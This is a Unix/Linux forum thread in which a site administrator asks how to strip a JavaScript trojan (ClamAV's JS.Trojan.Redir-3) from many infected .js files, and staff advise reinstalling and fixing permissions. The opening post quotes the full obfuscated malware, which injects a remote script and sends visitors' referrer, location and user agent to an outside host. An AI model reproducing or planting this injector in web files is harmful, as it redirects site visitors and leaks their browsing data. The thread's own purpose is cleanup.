how to remove hacking code from multiple files | Unix Linux Forums | Shell Programming and Scripting

  Go Back    


Shell Programming and Scripting Post questions about KSH, CSH, SH, BASH, PERL, PHP, SED, AWK and OTHER shell scripts and shell scripting languages here.

how to remove hacking code from multiple files

Shell Programming and Scripting


Closed Thread    
 
Thread Tools Search this Thread Display Modes
    #1  
Old 10-02-2012
MaRiOsGR MaRiOsGR is offline
Registered User
 
Join Date: Apr 2012
Last Activity: 20 February 2013, 6:26 AM EST
Posts: 16
Thanks: 1
Thanked 0 Times in 0 Posts
how to remove hacking code from multiple files

Hello,

I've located with clamav multiple .js files infected at the end with the above (JS.Trojan.Redir-3) code


Code:
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29
\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27
\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B
\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63
\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63
\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72
\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D
\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69
\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79
\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C
\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,
_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--)
{_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return 
_0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3])
{_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} 
(_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

I would like to remove all of these with a shell command.

I would use as an example this one :

Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

but I'm not sure what to change with all the escape characters and the * symbols.

any help would be appriciated.
Sponsored Links
    #2  
Old 10-03-2012
jim mcnamara jim mcnamara is offline Forum Staff  
...@...
 
Join Date: Feb 2004
Last Activity: 24 October 2014, 12:39 PM EDT
Location: NM
Posts: 10,250
Thanks: 282
Thanked 803 Times in 747 Posts
Suggestion: if this is java for an application remove the app completely and then re-install. Assuming these are required for some application that users need, you could break the application by trying to uninject code.

If new files just magically appeared then delete the whole files.

However the code got injected, there are some problems on the system with permissions, or someone is surfing the net with privilege, or working on questionable sites. You need to block the behavior or change file permissions that put the code there.

And consider hardening your system.
Sponsored Links
    #3  
Old 10-03-2012
Corona688 Corona688 is offline Forum Staff  
Mead Rotor
 
Join Date: Aug 2005
Last Activity: 24 October 2014, 4:38 PM EDT
Location: Saskatchewan
Posts: 19,683
Thanks: 823
Thanked 3,352 Times in 3,139 Posts
Yeah, restore from backup or re-install. Would you ever really trust those files again? I wouldn't.
    #4  
Old 10-04-2012
MaRiOsGR MaRiOsGR is offline
Registered User
 
Join Date: Apr 2012
Last Activity: 20 February 2013, 6:26 AM EST
Posts: 16
Thanks: 1
Thanked 0 Times in 0 Posts
I'm not asking of opinions if I should harden the server or delete the files.
My question is specific about removing specific text into multiple files with shell/script.
maybe the text wouldn't be hack code , maybe it would be a poem, still I want to do the same thing, removing specific text into multiple files with shell/script.
Sponsored Links
    #5  
Old 10-04-2012
bakunin bakunin is offline Forum Staff  
Bughunter Extraordinaire
 
Join Date: May 2005
Last Activity: 24 October 2014, 6:36 PM EDT
Location: In the leftmost byte of /dev/kmem
Posts: 4,286
Thanks: 45
Thanked 824 Times in 651 Posts
Quote:
Originally Posted by MaRiOsGR View Post
I'm not asking of opinions
Please accept my sincere apologies for the impetousity of my young and unexperienced colleagues who tried to help you. Of course they were wrong.

Quote:
I would like to remove all of these with a shell command.
To strictly answer your question: use any text-editing tool you like, including (but not limited to): awk, sed, perl, ed, ex, vi, ... All of these tools can be invocated as shell commands.

Quote:
I would use as an example this one :


Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i [...]

but I'm not sure what to change with all the escape characters and the * symbols.
If you are not sure i suggest you use another tool with which you are. Replace "perl" with "awk", "sed" or any other of the aforementioned text filters until you find one with which you are indeed sure, then use that one. To suggest one would largely be a matter of opinion and you specifically did not ask for that, so i will keep my completely arbitrary personal pejoratives to myself.

I hope this helps.

bakunin
Sponsored Links
    #6  
Old 10-04-2012
MaRiOsGR MaRiOsGR is offline
Registered User
 
Join Date: Apr 2012
Last Activity: 20 February 2013, 6:26 AM EST
Posts: 16
Thanks: 1
Thanked 0 Times in 0 Posts
Quote:
Originally Posted by bakunin View Post
To suggest one would largely be a matter of opinion and you specifically did not ask for that, so i will keep my completely arbitrary personal pejoratives to myself.
It's "good" to see you have spare time for irony,
it has nothing to do with helping, but ofcourse everyone can post everything he likes.

While posting here in the forum I see
Quote:
Shell Programming and Scripting Post questions about KSH, CSH, SH, BASH, PERL, PHP, SED, AWK and OTHER shell scripts and shell scripting languages here.
I'm sure they did put it for a reason there,so the replies I got was about the security of the server and not about the correct usage of perl
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

I know you got insulted for a reason I cannot explain with my previous post, but my question was specific and I was trying to narrow down the possible answers.

Someone could also reply that I should not use javascript
or that I shouldn't use linux servers,
but that would no help at all, wouldn't it?

Quote:
Originally Posted by bakunin View Post
If you are not sure i suggest you use another tool with which you are..
If I was sure for another tool or the exact command,
I wouldn't post this,asking for people who know how to use it correctly,
wouldn't I ?
Sponsored Links
    #7  
Old 10-04-2012
Corona688 Corona688 is offline Forum Staff  
Mead Rotor
 
Join Date: Aug 2005
Last Activity: 24 October 2014, 4:38 PM EDT
Location: Saskatchewan
Posts: 19,683
Thanks: 823
Thanked 3,352 Times in 3,139 Posts
If there was an easy magic do-everything fix for you, we'd give it to you so you could get it fixed and stop insulting us.

It's not "opinion". I've dealt with this before. These kind of malware infections are designed to be difficult to detect and remove. When I ran into a situation like this where the customer had no backups, I wrestled with it for days, but removing the bad parts kept breaking the pages, and it made efforts to put itself back that made everything worse than when I started. I eventually had to track down the original .zip files for the software -- thank goodness the internet is huge, some data-packrat somewhere or other is likely to have anything -- replace everything with a .php extension, and remove everything else newer than 90 days old.

Then afterwards, I secured the permissions properly so it wouldn't happen again...
Sponsored Links
Closed Thread

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

More UNIX and Linux Forum Topics You Might Find Helpful
Thread Thread Starter Forum Replies Last Post
Remove java code from multiple files dhasbro Shell Programming and Scripting 10 10-20-2011 02:49 PM
How to remove characters from multiple .txt files meetsubhas UNIX for Dummies Questions & Answers 4 01-29-2011 06:53 AM
To remove multiple files in FTP nani1984 Shell Programming and Scripting 2 01-04-2011 04:58 PM
How to remove certain lines in multiple txt files? olloong Shell Programming and Scripting 5 11-15-2008 04:43 AM
read list of filenames from text file and remove these files in multiple directories fxvisions Shell Programming and Scripting 5 08-07-2008 03:59 PM



All times are GMT -4. The time now is 09:28 PM.